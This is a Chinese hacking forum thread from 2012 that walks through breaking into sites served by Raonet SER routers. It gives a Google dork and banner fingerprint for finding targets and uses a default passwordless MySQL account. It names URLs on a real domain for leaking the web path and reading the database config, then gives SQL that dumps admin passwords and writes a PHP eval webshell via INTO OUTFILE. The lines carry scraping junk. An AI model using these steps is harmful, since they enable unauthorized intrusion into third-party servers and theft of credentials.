找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2894|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:
# ^$ X/ A7 p5 }) [& K; n0 D) _
& o* P& [+ C) K8 p* y0 u1:google搜索'Raonet Subscriber Ethernet Router'
* n* n/ `* T* B, \1 v& b, s" d# Y: ?, R6 x3 z
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
5 D  T! l6 t. }4 T4 u7 [0 }+ S) z( B, A& u- a
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。) w* _* e& Q  L$ l  Y
( L3 }: t6 h$ [' K& l
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
& V- ?4 h" b7 c$ z
* g0 b3 j1 N( _' U3 A( u2 n : ]" r# n! g  i- Z% Q% D8 J% Q+ Y
6 U5 q, M3 M9 x5 h' E/ F
入侵步骤:
/ G8 t8 Y5 ~- X- |  [+ n4 ]" R) U9 s$ o+ y5 p- D. K
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
1 a/ D2 d1 [7 I9 [9 ~( Q. f- W
5 Z, Z" B: J" R2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc- B! R* d+ H$ z$ V9 m4 ]" Q
3:得到密码后连接,查看GUI管理密码:1 q; ~  G6 p- V# {; ^! w
use ser_500& ]' o) V% l7 A  ?& o0 V/ y: E/ M  g
select id,passwd from user;
. l0 S: @' R& O0 n& [* L: Q4:通过数据库写入webshell,执行命令:9 T! ^; A, [& b0 ^. B0 p, H5 |' j
use mysql;+ g4 \4 i# Y  ?6 o# M
create table ok(cmd TEXT);$ Q$ |3 `6 j$ `: H
insert into ok values("<?php @eval($_POST[cmd])?>");, Y# |) X! j6 _7 A
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";. A: v8 N1 s! O+ J2 X
drop table ok;/ a" h) K- C7 J: Z, j
* A; `% ^! J$ r. J9 l( I
5:连接后门shell.php " v4 X9 y6 v! J
9 h1 n* K  x$ S; I
6. 搞定!
7 T9 G5 G5 {5 V% \! q
" w" p. ]4 m" @6 q9 z% {
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表